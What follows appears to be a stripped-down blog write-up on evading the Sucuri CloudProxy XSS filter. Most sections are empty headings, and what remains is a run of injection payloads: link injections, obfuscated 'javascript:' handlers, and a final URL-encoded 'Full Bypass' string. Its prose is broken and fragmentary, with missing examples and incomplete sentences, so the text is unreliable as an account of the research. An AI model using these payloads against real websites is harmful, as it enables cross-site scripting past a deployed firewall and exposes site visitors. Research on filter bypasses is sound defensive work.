Introduction

Example #1





As you can see fr that a completely harmless text triggers an alert, as the regular expression is checking for any thing before and after "src" attribute.

Example 2

Sucuri XSS Filter

Our CloudProxy firewall does protect your site against XSS script injections if you want to prevent them from ever being used to compromise your site

Methodology

Initial Tests - Brute Force

Constructing A Bypass - Regex Reversing

"><a href=http://www.google.com>CLICK</a>





"><a/href=http://www.google.com>CLICK</a>

"><a%0c href=http://www.google.com>CLICK</a>









http://www.site.com/shop.php?c=4 "><a fooooooooooooooooooooooooooo href=http://www.google.com>CLICK</a>













"><a fooooooooooooooooooooooooooo href=javascript:alert(1)>CLICK</a>









"><a fooooooooooooooooooooooooooo href=javAsCript:alert(1)>CLICK</a>

"><a fooooooooooooooooooooooooooo href=javAsCript:>CLICK</a>

"><a fooooooooooooooooooooooooooo href=javAsCript:test>CLICK</a>









Full Bypass

><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>

Ethical Considerations

In Closing

@mmrupp





Unavoidable User Interaction